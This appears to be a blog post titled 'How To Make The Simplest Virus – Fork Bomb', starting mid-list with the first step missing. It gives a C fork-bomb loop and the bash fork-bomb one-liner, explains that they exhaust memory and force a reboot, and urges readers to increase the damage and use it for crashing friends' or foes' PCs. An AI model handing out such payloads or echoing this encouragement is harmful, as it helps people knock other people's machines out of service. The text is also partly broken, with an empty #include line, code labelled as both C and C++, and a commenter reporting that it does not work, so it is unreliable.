How To Make The Simplest Virus – Fork Bomb [Hacks]
2) Save as .bat , for example fork.bat
3) Launch .bat file that you created in step 2 , once a successful fork bomb has activated in a system, one may have to reboot to resume normal operation.
C Fork Bomb
Here is a in C++ version of Fork bomb.
#include
int main(void)
{
while(1)
fork();
return 0;
}
Shell Script Fork Bomb
And a shell (Unix/bash) version.: (){ : |:& };:Once a successful fork bomb has activated in a system, one may have to reboot to resume normal operation. Stopping a fork bomb requires destroying all running instances of it. Trying to use a program to kill the rogue processes normally requires creating another process a difficult or impossible task as it will totally use memory for its instances.
You can get creative and try to use program executables or call system applications or utilities recursively in the same manner and increase the damage manifolds. Let your creativity run loose.
Use it for crashing your friends/foe’s PC
................................................................................
Enjoy...(Y)
And feel free to comment...
c++ version is not working.. pl help
ReplyDelete